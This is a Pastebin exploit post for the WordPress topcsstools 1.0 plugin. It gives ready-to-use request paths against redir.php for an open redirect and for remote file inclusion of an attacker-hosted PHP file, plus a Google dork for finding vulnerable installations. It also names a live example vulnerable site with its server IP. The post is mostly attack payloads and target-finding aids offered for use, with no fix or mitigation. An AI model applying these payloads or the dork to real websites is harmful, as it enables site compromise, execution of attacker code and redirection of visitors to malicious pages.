Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################
- # Exploit Title : WordPress topcsstools Plugins 1.0 Remote File Inclusion and Open Redirect
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/01/2019
- # Vendor Homepage : wordpress.org - cssgallery.com
- # Software Information Links : cssgallery.com/premium-themes.html
- + cssgallery.com/css-design.html
- # Version : 1.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/topcsstools/"
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- CWE-98 [ Improper Control of Filename for Include/
- Require Statement in PHP Program ('PHP Remote File Inclusion') ]
- #################################################################################
- # Open Redirection Exploit :
- **************************
- /wp-content/plugins/topcsstools/redir.php?u=https://[OPEN-REDIRECT-ADDRESS-HERE.gov]
- # RFI Remote File Inclusion Exploit :
- **********************************
- /wp-content/plugins/topcsstools/redir.php?u=http://[RFI-ADDRESS-HERE.gov/yourfilename.php.txt]
- #################################################################################
- # Example Vulnerable Site :
- *************************
- [+] cssgallery.com/wp-content/plugins/topcsstools/redir.php?u=http://exploit4arab.org/
- Note : (50.63.43.1) => There are 3,158 domains hosted on this server.
- #################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement